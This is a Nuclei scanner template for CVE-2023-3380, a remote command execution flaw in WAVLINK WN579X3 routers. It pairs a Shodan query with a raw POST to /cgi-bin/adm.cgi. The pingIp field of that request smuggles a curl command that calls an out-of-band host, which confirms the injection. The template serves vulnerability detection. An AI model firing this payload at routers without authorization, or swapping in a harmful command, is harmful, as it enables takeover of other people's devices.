62 lines
1.7 KiB
YAML
62 lines
1.7 KiB
YAML
id: CVE-2023-3380
|
|
|
|
info:
|
|
name: WAVLINK WN579X3 - Remote Command Execution
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: |
|
|
Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
|
|
reference:
|
|
- https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
|
|
- https://vuldb.com/?ctiid.232236
|
|
- https://vuldb.com/?id.232236
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-3380
|
|
cwe-id: CWE-74
|
|
epss-score: 0.00064
|
|
epss-percentile: 0.26519
|
|
cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
vendor: wavlink
|
|
product: wn579x3_firmware
|
|
shodan-query: http.html:"Wavlink"
|
|
tags: cve,cve2023,wavlink,rce
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "images/WAVLINK-logo.png"
|
|
- "<title>Wi-Fi APP Login</title>"
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/adm.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{RootURL}}/ping.shtml
|
|
|
|
page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100be619f43d5ece6eb354358b4e2b33fa9a6caca6802adf62d685ab48171ebc1c7022100af1ecda3534437a6f4c1cdd7c8045a977140ae8059c061d71f15e68b6d489268:922c64590222798bb761d5b6d8e72950 |